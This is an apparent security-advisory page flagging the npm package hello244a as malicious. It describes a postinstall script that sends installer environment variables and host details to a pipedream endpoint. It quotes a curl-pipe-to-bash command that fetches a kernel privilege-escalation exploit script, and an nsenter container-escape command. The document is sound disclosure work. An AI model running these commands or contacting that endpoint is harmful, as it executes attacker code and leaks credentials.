OSV Malicious Advisory
scanned 3h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-5188 confirms this npm version as malicious. package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2)...
Advisory
MAL-2026-5188
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in hello244a (npm)
Details
package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2) on Linux, executes `curl -s https://raw.githubusercontent.com/Akabe1/akabe1.github.io/master/_posts/exploits/cve-2021-22555/exploit.sh | bash`, fetching and running an unpinned third-party shell script referencing a known Linux kernel local-privilege-escalation CVE; (3) attempts container/sandbox escape via `nsenter --mount=/proc/1/ns/mnt -- /bin/sh` on Linux and `docker exec` against running containers on Windows, with results reported back to the same pipedream endpoint. Behavior fires automatically on `npm install` with no user interaction. Installer harm is concrete: environment variables (which routinely contain credentials, tokens, and CI secrets) plus host identity are leaked to the attacker, and arbitrary attacker-controlled code executes in the installer's user context with privilege-escalation and container-escape attempts.
## Source: ghsa-malware (4a8d45ba8952a2231178f5d175eb173c678ad0fc41000370a58823f537734259) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
## Source: ossf-package-analysis (91844b3ed7a531e129cbdeef1746ccd1e8e981f74da00aa2a4aef2edf6b47dbf) The OpenSSF Package Analysis project identified 'hello244a' @ 1.0.12 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
Decision reason
One or more suspicious static signals were detected.
Decision evidence
public snapshotBehavioral surface
NoLicense
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = test
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = test
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgFindings
1 High1 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present
LowNo License